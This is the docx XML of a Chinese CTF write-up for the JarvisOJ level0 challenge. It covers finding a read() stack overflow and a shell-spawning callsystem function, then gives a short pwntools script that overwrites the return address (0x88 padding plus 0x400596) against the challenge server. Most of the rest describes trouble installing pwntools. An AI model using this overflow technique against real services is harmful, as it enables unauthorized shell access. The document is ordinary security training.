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查看文件属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="583565"/>
            <wp:effectExtent l="0" t="0" r="635" b="1079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8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检查保护性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="713740"/>
            <wp:effectExtent l="0" t="0" r="1905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1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打开IDA F5查看伪代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="63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 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跳出hello world，然后返回vulnerable_function函数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3743325" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="571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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 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然后又</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发现一个可以直接get shell的函数callsystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3086100" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="762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r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>read函数存在栈溢出，我们可以利用栈溢出把返回地址覆盖程callsystem的入口地址</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4963160"/>
            <wp:effectExtent l="0" t="0" r="4445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96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010150" cy="6915150"/>
            <wp:effectExtent l="0" t="0" r="381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691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457700" cy="6286500"/>
            <wp:effectExtent l="0" t="0" r="762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628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048250" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="1143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需要覆盖0x88个字符（0x80+0x8）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</w:pPr>
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>r=remote('pwn2.jarvisoj.com',9881)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload='a'*0x88+p64(0x400596)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>r.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>r.interactive()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然后用gedit level.py将代码拷贝进去，然后执行，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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269865" cy="1440815"/>
            <wp:effectExtent l="0" t="0" r="3175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4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遇到的问题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运行python level.py时出现报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271135" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="1905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下面就安装了python2版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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272405" cy="2853055"/>
            <wp:effectExtent l="0" t="0" r="635" b="1206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5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再一次运行以上语句，又出现错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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269865" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="3175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通过查资料知道没有安装pwntools,然后去安装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首先要安装pip,这个会花费很长时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271770" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="127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检查是否安装上了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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270500" cy="347980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="25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安装pwntools,显示失败</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271770" cy="1484630"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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48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271770" cy="452120"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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5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查阅资料升级pip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271135" cy="1155700"/>
            <wp:effectExtent l="0" t="0" r="1905" b="254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271770" cy="287020"/>
            <wp:effectExtent l="0" t="0" r="1270" b="254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下面安装pwntools(查阅资料得到安装语句）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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272405" cy="1261110"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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显示成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271770" cy="939800"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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3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再一次执行python level0.py语句，又报错，显示没有pathlib2模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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271770" cy="2213610"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1143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21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安装这个模块就好</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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269230" cy="1241425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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4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在执行python level0.py语句，成功然后输入数据，就成功了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1426210"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635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2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9B582D"/>
    <w:rsid w:val="769B5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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml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114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2021-10-21T12:48:00Z</dcterms:created>
  <dc:creator>28308</dc:creator>
  <cp:lastModifiedBy>哎狸猫</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-21T14:42:47Z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4C8D9EF2784A44A5BF1CD212195E69DA</vt:lpwstr>
  </property>
</Properties>
</file>